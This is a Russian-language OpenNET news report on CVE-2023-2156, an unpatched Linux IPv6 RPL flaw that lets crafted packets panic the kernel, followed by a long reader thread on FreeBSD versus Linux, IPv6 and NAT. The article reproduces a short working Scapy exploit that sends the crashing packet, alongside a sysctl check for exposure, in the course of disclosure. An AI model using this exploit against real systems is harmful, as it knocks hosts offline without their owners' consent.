The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

0-day уязвимость в IPv6-стеке Linux, позволяющая удалённо вызвать крах ядра

17.05.2023 09:18

Раскрыты сведения о неисправленной (0-day) уязвимости (CVE-2023-2156) в ядре Linux, позволяющей остановить работу системы через отправку специально оформленных пакетов IPv6 (packet-of-death). Проблема проявляется только при включении поддержки протокола RPL (Routing Protocol for Low-Power and Lossy Networks), который в дистрибутивах по умолчанию отключён и применяется, главным образом, на встраиваемых устройствах, работающих в беспроводных сетях с большой потерей пакетов.

Уязвимость вызвана некорректной обработкой внешних данных в коде разбора протокола RPL, которая приводит к срабатыванию assert-сбоя и переходу ядра в состояние panic. При размещении в структуре k_buff (Socket Buffer) данных, полученных в результате разбора заголовка пакета IPv6 RPL, если поле CmprI выставлено в значение 15, поле Segleft в 1, а CmprE в 0, 48-байтный вектор с адресами распаковывается до 528 байт и возникает ситуация, когда выделенной для буфера памяти оказывается недостаточно. В этом случае в функции skb_push, применяемой для помещения данных в структуру, срабатывает проверка на несоответствие размера данных и буфера, генерирующая состояние panic, чтобы предотвратить запись за границу буфера.

Пример эксплоита:



   # We'll use Scapy to craft the packet 
   from scapy.all import *
   import socket

   # Use the IPv6 from your LAN interface
   DST_ADDR = sys.argv[1]
   SRC_ADDR = DST_ADDR

   # We use sockets to send the packet
   sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)

   # Craft the packet
   #   Type = 3 makes this an RPL packet
   #   Addresses contains 3 addresses, but because CmprI is 15, 
   # each octet of the first two addresses is treated as a compressed address
   #   Segleft = 1 to trigger the amplification
   #   lastentry = 0xf0 sets CmprI to 15 and CmprE to 0

   p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / 
      IPv6ExtHdrSegmentRouting(type=3, addresses=["a8::", "a7::", "a6::"], segleft=1, lastentry=0xf0)

   # Send this evil packet
   sockfd.sendto(bytes(p), (DST_ADDR, 0))

Примечательно, что разработчики ядра были уведомлены об уязвимости ещё в январе 2022 года и за прошедшие 15 месяцев три раза попытались устранить проблему, выпустив патчи в сентябре 2022 , октябре 2022 и апреле 2023 года, но каждый раз исправлений оказывалось недостаточно и уязвимость удавалось воспроизвести. В конечном счёте проект ZDI, координировавший работу по устранению уязвимости, принял решение раскрыть детальную информацию об уязвимости, не дожидаясь появления работающего исправления в ядре.

Таким образом уязвимость до сих пор остаётся неисправленной. В том числе не эффективен патч, вошедший в ядро 6.4-rc2. Пользователям рекомендуется проверить, что протокол RPL в их системах не используется, что можно сделать при помощи команды


   sysctl -a | grep -i rpl_seg_enabled


  1. Главная ссылка к новости (https://www.interruptlabs.co.u...)
  2. OpenNews: Удалённая уязвимость в IPv6-стеке OpenBSD
  3. OpenNews: Уязвимости в IPv6-стеке FreeBSD
  4. OpenNews: Удалённые уязвимости в IPv6-стеках OpenBSD и FreeBSD
  5. OpenNews: Уязвимость в ядре Linux, позволяющая вызвать крах через отправку UDP-пакета
  6. OpenNews: Уязвимости в TCP-стеках Linux и FreeBSD, приводящие к удалённому отказу в обслуживании
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/59146-ipv6
Ключевые слова: ipv6, dos, rpl
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (253) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Я так сказал (?), 09:42, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    дерьмо случается, такова жизнь
    но меня смущает что уж больно много гавнокода в этом донном ядре
     
     
  • 2.35, xPhoenix (ok), 10:45, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –4 +/
    У FreeBSD проверенное, надёжное ядро. Но очень мало кто пользуется этой ОС.
     
     
  • 3.49, Аноним (49), 11:08, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +13 +/
    Как только FreeBSD дорастёт до популярности Linux думаю вопросов будет не меньше.
    Популяризация раздувает всё что видит. "У вас несчастные случаи на стройке были? Не, пока еще ни одного не было. Будут".
     
     
  • 4.93, Аноним (93), 12:47, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Да, до пика популярности linux уязвимостей в нем находили сильно меньше
     
     
  • 5.217, абв (?), 00:50, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    А пик популярности - это когда?
     
     
  • 6.255, Аноним (93), 11:05, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Наверное когда убунту стала "официальной игровой платформой", когда большая часть оборудования на linux стала работать нормально (видеокарты, вебкамеры, принтеры, сканеры, др), когда linux на десктопах перестал быть редкостью и стал чем-то +- обычным у ITшников и околоITшников, и когда почти весь трендовый (особенно закрытый) софт стал иметь линукс версии, причем не порезанные.
    Примерное начало этого в 2011-2013, рассвет в 2015-2017.
    До 2010 linux можно было встретить гораздо реже, и довольно большая часть оборудования на нем полноценно не работала (например, из видеокарт только интел тогда мог что-то дельное показать, но в то время они были слабыми).
    Сейчас linux проник везде (даже в винду), о нем знают все, ковыряют соответственно тоже все.
     
  • 4.179, bOOster (ok), 20:53, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Очередной раз у оголтелых линуксоидов пу.к.аны рвет? Очередной раз смотрят в книгу видят фигу?
    Сколько раз рассказывалось про PlayStation 3+, Nintendo Switch, да и с подгорающих хватит. Но нет - постоянная амнезия.
    Мозгов то хватит посмотреть сколько таких устройств продано, и работают с FreeBSD ядром?
    Причем и PlayStation и Switch весьма неслабо ковыряли насчет взлома. Но ничего существенного нет, кроме броузера (PS), через который и ломают.
     
     
  • 5.186, Аноним (186), 22:03, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    BSD на перечисленных вами устройствах по единственной причине - лицензия BSD.
    По поводу устройств на bsd - их существенно меньше, чем устройств на linux (и кстати это не показатель).
    По поводу взломов - интересующиеся темой в курсе, что взломы сложные/небыстрые не из-за BSD, а из-за создателей этих устройств, которые реализовали множество аппаратных и программных защит.
     
     
  • 6.236, bOOster (ok), 07:04, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Ну когда в голове пусто тогда и всплывает единственно лицензия А на самом дел... большой текст свёрнут, показать
     
     
  • 7.266, Аноним (93), 12:02, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Это выводы многих, кто связан с индустрией Погугли статьи на тему выбора BSD дл... большой текст свёрнут, показать
     
     
  • 8.278, Аноним (278), 15:52, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Исходники винды в мир утекали, поэтому тебе же не составит труда показать, где и... текст свёрнут, показать
     
     
  • 9.281, Аноним (93), 17:02, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Пользуйся поиском, это общеизвестный факт гуглить лучше на английском Даже са... текст свёрнут, показать
     
  • 6.237, bOOster (ok), 07:19, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > BSD на перечисленных вами устройствах по единственной причине - лицензия BSD.
    > По поводу устройств на bsd - их существенно меньше, чем устройств на
    > linux (и кстати это не показатель).
    > По поводу взломов - интересующиеся темой в курсе, что взломы сложные/небыстрые не
    > из-за BSD, а из-за создателей этих устройств, которые реализовали множество аппаратных
    > и программных защит.

    А да, Task Sсheduler забыл ULE vs CFS в Linux. Пытались там че-то переписывать, на-воз и ныне там.

    https://www.usenix.org/system/files/conference/atc18/atc18-bouron.pdf

     
  • 5.199, Аноним (199), 23:16, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Тю, нетфликса где потерял?
     
  • 4.234, Тот_Самый_Анонимус__ (?), 05:12, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    >Как только FreeBSD дорастёт до популярности Linux думаю вопросов будет не меньше.

    Ну собственно это ровно тот же спор что у сторонников венды и линуха. раньше линухойды любили кричать что в винде слишком много уязвимостей, не обращая внимания на популярность систем. Теперь убмеранг вернулся.

     
  • 3.51, Аноним (51), 11:19, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Проверенное кем?
    Надёжное? А вот здесь интересно, особенно когда из-за постоянных глюков и падений без постоянного шаманизма не обойтись. И чем дальше, тем хуже.
    Я иногда таки пользуюсь этой ОС, чисто ради при кола.
     
     
  • 4.116, OpenEcho (?), 14:21, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > особенно когда из-за постоянных глюков и падений без постоянного шаманизма не обойтись.

    А может все таки - ручки не из того места растут?

     
     
  • 5.176, Аноним (176), 20:24, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Да блин, ручки не из того места растут. Иначе сам бы написал новый вайфай стек, сделал бы правильную инициализацию устройств при загрузке(это я о том, что иногда reboot до паники доводит. Надо выкл/вкл делать), подправил бы иксы, починил бы видеоускорение(хотя бы для своей i915)...
    Да хотя бы написал нормальный инит, или openlaunchd прикрутил бы.

    Ты пожалуйста думай перед тем как аникейские отмазки 20-летней давности кидать.

     
     
  • 6.280, OpenEcho (?), 16:19, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Тебе не кажется, что это странно, что у других оно не так как у тебя Теперь пон... большой текст свёрнут, показать
     
  • 4.125, Аноним (125), 15:15, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > чисто ради при кола

    Значение знаешь?

     
     
  • 5.251, Anonim (??), 09:53, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    ненаход
     
  • 4.181, bOOster (ok), 20:56, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Sony, Nintendo, миллионами устройств, проданных на FreeBSD ядре. Причем весьма интенсивно изучались, взламывалось. Но нет в отличие от дуршлата под названием Linux, ничего серьезного найденного не было.
     
     
  • 5.206, Аноним (206), 23:34, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Sony, Nintendo, миллионами устройств, проданных на FreeBSD ядре.

    У Вас уже есть эти ядра в исходниках? Они будут информировать Вас насчет патчей?

     
     
  • 6.245, bOOster (ok), 08:43, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    1. Да достаточно даже того что PS 3+ интенсивно ковырялись толпой профессиональных хакеров

    -"Following his announcement of a Kernel Exploit for FreeBSD 10.2, today PlayStation 4 developer CTurt revealed news of a new FreeBSD kernel exploit which he says will be published for PS4 developers to examine once the security team patches it. "

    2. В современных версиях FreeBSD этих уязвимостей уже нет. Так что с большой вероятностью что код из ядра PS3+ попадает в открытое FreeBSD ядро. Хотя я понимаю - у оголтелых очередной раз подгорает что принуждающая GPL лицензия никаких бонусов перед абсолютно открытой BSD лицензий практически не имеет. Зато агрессивности GPL не занимать.

     
     
  • 7.246, Аноним (246), 09:00, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Так что с большой вероятностью что код из ядра PS3+ попадает в открытое FreeBSD ядро.

    лицензия BSD это "остается уповать на добрую волю корпораций"

     
     
  • 8.252, bOOster (ok), 09:53, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Вот именно это и называется свобода без оговорок для всех ... текст свёрнут, показать
     
     
  • 9.254, Аноним (246), 11:00, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Это лохотрон BSD лицензия работает с прицелом на то что корпорация наймет студе... текст свёрнут, показать
     
  • 9.285, Аноним (-), 19:09, 18/05/2023 Скрыто ботом-модератором     [к модератору]
  • +/
     
     
  • 10.294, bOOster (ok), 08:49, 19/05/2023 Скрыто ботом-модератором     [к модератору]
  • +/
     
     
  • 11.303, Аноним (303), 17:30, 21/05/2023 Скрыто ботом-модератором     [к модератору]
  • +/
     
     
  • 12.304, bOOster (ok), 05:17, 22/05/2023 Скрыто ботом-модератором     [к модератору]
  • +/
     
     
  • 13.314, Аноним (314), 21:05, 23/05/2023 Скрыто ботом-модератором     [к модератору]
  • +/
     
     
  • 14.318, bOOster (ok), 07:58, 24/05/2023 Скрыто ботом-модератором     [к модератору]
  • +/
     
  • 8.256, n00by (ok), 11:21, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Хватит слов, покажите _свой_ код под GPL ... текст свёрнут, показать
     
  • 3.81, YetAnotherOnanym (ok), 12:13, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > У FreeBSD проверенное, надёжное ядро

    Это мог бы быть тонкий троллинг и удачный наброс, но нет. У бсдей тоже находили косяки в ядре. При всей моей любви в фряхе не вижу смысла притворяться, что это невозможно.

     
  • 3.108, Аноним (108), 13:53, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Поэтому и неулов...неуязвимое.
     
  • 3.142, Аноним (142), 16:13, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > У FreeBSD проверенное, надёжное ядро.

    Достаточно почитать историю с попыткой комита туда вайргада, чтобы усомниться в этом.

    > Но очень мало кто пользуется этой ОС.

    Извините но линуксы просто удобнее и практичнее. А свои баги мы починим. Даже в экзотичных протоколах для IOT (а в фре это вообще есть?).

     
  • 3.202, Аноним (206), 23:27, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > У FreeBSD проверенное, надёжное ядро.

    Вам уже корпорации предоставили своё патченое BSD? А про Ваше они помалкивают даже если узнали.  

     
     
  • 4.214, Аноним (214), 00:15, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Вам уже корпорации предоставили своё патченое Линукс, которое гоняется на серваках и прочих SaaS? Или как обычно - "вынипонимаитиэтодругое!"
     
     
  • 5.286, Аноним (-), 19:13, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Вам уже корпорации предоставили своё патченое Линукс, которое гоняется на серваках и
    > прочих SaaS? Или как обычно - "вынипонимаитиэтодругое!"

    Вопрос в соотношениях. Если 90% берет код и не возвращает а 10% контрибутит это одно, а если 90% контрибутит а 10% не возвращает - таки, другое. Хотя если чисто номинально фактами жонглировать то как бы одно и то же явление природы. С практической же точки зрени вон там будет дохлый апстрим а вон там процветающее сообщество.

    И кстати с практической точки зрения САБЖ вообще хрен найдешь где эксплуатировать:
    На всех машинах где я ткнулся было
    > net.ipv6.conf.all.rpl_seg_enabled = 0

    ...и чего там эксплойтом огревать? Тролей на опеннете? Они айпишник не скажут да и зассут включить :(

     
     
  • 6.288, Аноним (214), 19:18, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    >> Вам уже корпорации предоставили своё патченое Линукс, которое гоняется на серваках и
    >> прочих SaaS? Или как обычно - "вынипонимаитиэтодругое!"
    > Вопрос в соотношениях. Если 90% берет код и не возвращает а 10% контрибутит это одно, а если 90% контрибутит а 10% не возвращает - таки, другое. Хотя если чисто номинально фактами жонглировать то как бы одно и то же явление природы.

    То ли дело чисто и неноминально жонглировать циферками, высосаными из пальца, попутно спрыгивая с темы ...

     
     
  • 7.315, Аноним (314), 21:07, 23/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Вон там https://matteocroce.medium.com/linux-and-freebsd-networking-cbadcdb15ddd кто-то циферками пожонглировал. Оказывается Virtio в фре тормозное. И это known issue. Я только 1 не понимаю: а какой смысл делать тормозной virtio вообще? У него весь пойнт в том что он легкий и быстрый.
     
     
  • 8.317, Аноним (317), 22:36, 23/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    пруфца на циферки Оказывается, очередная стремительная смена темы и ссылка на... текст свёрнут, показать
     
  • 2.137, Аноним (137), 15:46, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    А почему смущает-то?? Кто вообще сказал, что Линукс - это серьёзно? Linux JUST FOR FUN! :))) Для удовольствия! Что непонятного-то? И все эти технологии существуют в линуnсе с одной целью - чтобы разрабы, дилетанты, хоббииисты радостно пилил свои говнокодики. :) Всё логично.
     
     
  • 3.177, Аноним (176), 20:26, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Нука, серьёзный ты наш. Критикуя - предлагай замену.
     
     
  • 4.184, Аноним (184), 21:31, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    ReactOS?
     
  • 3.316, Аноним (-), 21:24, 23/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > А почему смущает-то?? Кто вообще сказал, что Линукс - это серьёзно? Linux
    > JUST FOR FUN! :))) Для удовольствия! Что непонятного-то?

    Так они и не врут. Для этого достаточно зайти к господам разработчикм Linux и повзаимодествовать с ними. Они реально пашут себе в кайф. Поэтому получается круто, компетентно, все такое. И они реально хотят получить кайфовую операционку. А то что на таких масштабах баги случаются - да, и чего? А напрячь syzbot'а какого мучать какой-то экзотичный диалект протокола, отключенный везде по дефолту, если и доперли то далеко не сразу. Спорим 90% посетителей узнали о том диалекте протокола из вот этой новости? :)

     

     ....большая нить свёрнута, показать (46)

  • 1.3, Аноним (3), 09:45, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • –11 +/
    Знал я, что этим (ipv6) нельзя пользоваться.
     
     
  • 2.4, Аноним (4), 09:58, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Точно. Сразу его вырубаю, или под корень в sysctl.conf, или хотя бы тотальный DROP в iptables (просто некоторым прогам под корень не нравится). Это уже стандартная практика.
     
     
  • 3.8, Аноним (8), 10:07, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +5 +/
    на локалхосте всё всегда элементарно делается
     
     
  • 4.11, шмякшмяк (?), 10:09, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Это же хорошо,а админусы пусть страдают им за это деньги платят.
     
  • 3.10, 1 (??), 10:07, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    А как же - "IP адреса все закончатся и мы все умрём ... вот щас щас ..." ?
     
     
  • 4.20, Аноним (20), 10:26, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Ну если принтеры с белыми адресами кое-где кое у кого умного ... Кстати, уже неоднократно.
     
     
  • 5.160, Аноним (278), 17:56, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    А в чём, кстати, проблема выдавать принтерам адреса из публичных диапазонов? Ну кроме того, что адепты святого Ната при виде такого иногда начинают бледнеть и заикаться. Адрес — это всего лишь циферки. Вы же не из тех, кто верит в магию чисел?
     
     
  • 6.205, Аноним (206), 23:31, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Что будет маршрутизировать публичный IP к Вашему принтеру?
     
     
  • 7.228, Аноним (278), 01:51, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Ничего не будет. Айпи из публичного диапазона не означает публичный доступ. Ну не роутится никуда за пределы офиса какой-нибудь небольшой /22 за пределы офиса, ну и бог с ним, никто не расстроится.
     
     
  • 8.235, Аноним (235), 05:47, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Тут есть коварная шляпа, о которой адепты нероутинга в паблик забывают А назад ... текст свёрнут, показать
     
  • 7.287, Аноним (-), 19:15, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Что будет маршрутизировать публичный IP к Вашему принтеру?

    Роутер, например. Правда, при этом неплохо бы озаботиться файрволом. И с камерами такая же ерунда. Иначе можно воооооон в те выдачи гугли попасть. Круто же когда можно в чьем-то гараже камеру покрутить. Даже без IPv6, кстати.

     
  • 4.38, v3625 (ok), 10:48, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +11 +/
    IP-адреса, конечно, не закончатся, но в перспективе все будут сидеть за натом (собственно, уже). А что, чтобы заходить на три веб-сайта, ip-адрес не нужен.

    Сейчас, конечно, много всякого говна форсится, но вот ipv6 - это однозначно добро. Пусть он во многом технически некрасив, но главную проблему - недостаток адресного пространства - решает. И если это сейчас не взлетит, то, считай, все. Ничего другого уже не появится.

    А опасения, что может не взлететь, вызывает то, что по-настоящему он корпорациями и не форсится, а используется, наоборот, как громоотвод для негатива. Пример: в android нельзя прописать альтернативные днс-сервера, кроме гугловских. Гугл на это официально отвечает: вот есть ipv6, протокол будущего, и там все работает как надо, а для ipv4 мы ничего менять не будем. Юзеры делают вывод, что ipv6 плохой, мешает им жить.

    А если б тот же гугл действительно его форсил, как он умеет (пример: HTTPS), то везде бы уже было.

    А все потому, что корпорациям в первую очередь не нужно, чтобы юзер полноценно использовал интернет, чтобы у него нормально работали p2p-протоколы обмена данными, децентрализованные мессенджеры/телефония и прочее (сейчас 90% проблем именно из-за ната). Им нужно, чтобы он был придатком к их сервисам. А для этого ip-адрес не нужен.

    Провайдерам это также не нужно, чтоб юзер генерил за те же деньги больше траффика (да еще и инвестировать в это). Им лучше продавать какой-нибудь воздух вместо этого.

    Поэтому, если ipv6 и взлетит, то, скорее, не благодаря, а вопреки, благодаря критической массе продвинутых юзеров, которые будут пользоваться.

     
     
  • 5.103, ДМИТРИЙ НАГИЕВ (?), 13:21, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    >сейчас 90% проблем именно из-за ната

    да что ж ты будешь делать, и тут тоже!

     
  • 5.168, Аноним (168), 18:41, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Коммунизм?
     
  • 5.220, Онан сын Иуды (?), 01:26, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    IPv6 это гебешная поделка и головная боль. Кроме 64 бит собственно адреса + 64 бит EUI (по стандарту) или рандом (когда спохватились, что зонд с орбиты видно), преимуществ для себя не нашёл. С 2017 дуалстек.
    Хотя нет, есть ещё одно неявное - китайцы не сканят порты ввиду отсутствия у них оного или задалбываются весь диапазон перебирать.
     
  • 5.277, Электрон (?), 15:37, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Некоторые "продвинутые" провайдеры успели начать переход на IPv6, например AS3209, AS3320 (у которого и так 33 млн. IPv4). DS-Lite, значит IPv4 трафик приходит NAT-ом, а IPv6 напрямую.
    Теперь бы как бизнес не противился, не вижу как эту архитектуру им провернуть обратно (никак), хотя логика в вашей идее есть.

    Тем не менее, поддержка на конечных устройствах и middleboxes оставляет желать лучшего. Вот у меня, например, IPv6 на Андроидах через день-два отваливаются. Проблема не единичная, но непонятно кто виноват.

    Со стороны хостинга популярны становятся IPv6-only VPS, потому что дорого.

    А вот всякие Бразилии и т.п. до сих пор блещут своими IPv4-only в p2p. Сравните себя с ними называется...

     
     
  • 6.289, v3625 (ok), 20:54, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Теперь бы как бизнес не противился, не вижу как эту архитектуру им провернуть обратно (никак)

    Вот этот момент не очень понял. Вроде, если уже внедрили, так зачем проворачивать назад и почему бизнес противится?

     
     
  • 7.293, Электрон (?), 08:00, 19/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Это я лишь продолжил идею этого абзаца:

    > Провайдерам это также не нужно, чтоб юзер генерил за те же деньги больше траффика (да еще и инвестировать в это). Им лучше продавать какой-нибудь воздух вместо этого.

    С другой же стороны, после введения 5G (точная геолокация) провайдеры сами будут пытаться монетизировать данные. Вот тут-то статические IPv6 на абонента/устройство пригодятся. Как, впрочем, и сайтам рекламы и аналитики. (Временные адреса оставим за рамками.)

     
  • 3.31, Аноним (31), 10:37, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Дело хозяйское, а вот у нас уже все проекты IPv6 only. Отключили v4 в прошлом году, потому что с NAT наш voip софт всё равно бесполезен, а в v4 мире полноценных белых IP у клиента уже не встретишь. Потеряли 2% клиентской базы, в принципе она не окупала v4 адресов и разработки костылей связанных с NAT'ами.
     
     
  • 4.118, Аноним (118), 14:31, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    имхо ты лукавишь
     
  • 4.132, FSA (??), 15:24, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > Потеряли 2% клиентской базы, в принципе она не окупала v4 адресов и разработки костылей связанных с NAT'ами.

    Оптимистично у вас. В РФ не найти нормального провайдера с IPv6. Только Ростелеком, который может порезать полностью входящие и отмораживается, мол мы не предоставляем IPv6, т.е. это ничем не лучше NAT, но хотя бы /56. И Дом.ру, который, говорят, выдаёт только /64, но, зато, официально и со статическим префиксом. Ещё несколько провайдеров в городе миллионнике тупо вообще не поддерживают IPv6, в том числе МТС и Билайн.

     
     
  • 5.140, v3625 (ok), 16:10, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Сейчас да, если какой-то провайдер и предоставляет ipv6, то неофициально В лю... большой текст свёрнут, показать
     
     
  • 6.158, Аноним (108), 17:44, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Я бы порезал и на /120 для своих подсеток, DHCPv6 никто не отменял. SLAAC: EUI-64 лютое зло, нефиг в инет светить MAC-ом устройств, которые могут быть уязвимы на уровне прошивки.
     
     
  • 7.161, Аноним (278), 18:03, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    1. use_tempaddr=2
    2. Фаерволл

    И не рассказывай, что у тебя устройства, уязвимые «на уровне прошивки» подключены напрямую к провайдеру, не поверю.

     
     
  • 8.172, Аноним (172), 19:04, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Сетевушка от Штеуда может быть уязвима Легко И, главное же, производители и е... текст свёрнут, показать
     
     
  • 9.188, Аноним (278), 22:14, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    И как тебе поможет или помешает наличие или отсутствие IPv6 в случае гипотетичес... текст свёрнут, показать
     
  • 7.166, v3625 (ok), 18:30, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Я тоже SLAAC не люблю, но, увы, приходится с ним мириться из-за андроида, который больше никак не умеет. Кстати, кроме него все остальное прекрасно умеет в DHCPv6: macos, ios, винда, линукс.

    А мак-адресами давно никто не светит, там просто рандом, и он к тому же все время меняется. Генерация по мак-адресам используется только для link-local адресов.

     
  • 6.169, Аноним (168), 18:43, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    бриджуешь это мостяришь?
     
     
  • 7.174, v3625 (ok), 19:38, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Именно. Объединяешь интерфейсы от всех туннелей в один мост.
     
  • 4.147, Ананий (?), 16:50, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > полноценных белых IP у клиента

    А в чем заключается неполноценность клиентских белый ойпи? в худшем случае блокировкой SMB и прочих виндовых портов? не велика печаль, да и время бластеров и сассеров уже давно ушло.

    Вот сижу я дома, что ни провайдер - то ipv4 онли. Ну ладно, может модномолодежный еще не пришел. А як по этим вашим ипв6 будут подключать обычных, неойти людей? Шоб телефон, шоб ноутбук, шоб телек с приставками. Само все настроится с шайтан-коробкой от "${companyname}телекома"?

    Ну вот пришел я работу работать, а там тоже кругом этот ваш старый ipв4 жизти и прогрессу мешает.Всякие wifi роутеры ipv4 раздают. Не воспользоваться мне вашим сервисом :(. Грусть-печаль.

     
     
  • 5.163, Аноним (278), 18:11, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Само все настроится с шайтан-коробкой от "${companyname}телекома"?

    Именно так. При этом коробка проще в устройстве, стейтлесс, и не страдает всеми болячками натов.

    > Не воспользоваться мне вашим сервисом

    Он же там явно написал: их бизнесу лузеры без ipv6 не нужны, так как доходы с них не покрывают расходы на ipv4 адреса.

     
  • 5.170, Аноним (168), 18:46, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    не велика печаль

    Мопеда?

     
  • 2.112, Аноним (108), 14:15, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Где ещё дешёвый или даже бесплатный белый адрес возможен, как не в IPv6?
    Или если захочешь в Yggdrasil, что делать будешь?
     
     
  • 3.126, 1 (??), 15:15, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –2 +/
    150р/мес - это дорого ?
    ovh - пока раздаёт задаром.
     
     
  • 4.146, v3625 (ok), 16:28, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Не то, чтобы дорого, но не массово. У тебя, например, есть, а у второй стороны нет. А если бы по дефолту у всех был и к каждому были бы возможны входящие коннекты без нат, наступил бы коммунизм.
     
     
  • 5.148, Ананий (?), 16:54, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    >у всех был и к каждому были бы возможны входящие коннекты без нат

    а можно не надо?
    не хочу шоб китайская девайсина, которую никто и никогда не будет обновлять, светила своими уязвимостями на весь тырнет.

     
     
  • 6.149, v3625 (ok), 17:06, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Зафаерволь девайсину/не включай на ней в6, в чем проблема?
     
     
  • 7.164, Аноним (278), 18:16, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Проблема в том, что локалхостные админы считают нат механизмом обеспечения безопасности. А публичные адреса автоматически считают доступными всегда и ото всюду.
     
     
  • 8.171, Аноним (168), 18:52, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    НЕ Вто, что вам рассказывали с надрывом о лучшем в мире образовании, и вы повер... текст свёрнут, показать
     
  • 5.200, Аноним (206), 23:22, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > А если бы по дефолту у всех был и к каждому были бы возможны входящие коннекты без нат

    Лукавый.

     
  • 4.222, Аноним (-), 01:31, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > 150р/мес - это дорого ?

    На десяток устройств - уже кусается. А, ну да, на вебморду ходить как белому человеку нельзя, надо е....я с какими-то костылями типа натов и портфорварда, да? Которые сами источник проблем - если хорошенько флудануть это конекциями, там RAM под это может закончиться.

    > ovh - пока раздаёт задаром.

    Хостеры пока еще разжают. Однако качать торенты с ната например это инвалидность полная.

     
  • 2.201, nuclight (ok), 23:27, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Да! Переходите на мой IPnh!
     

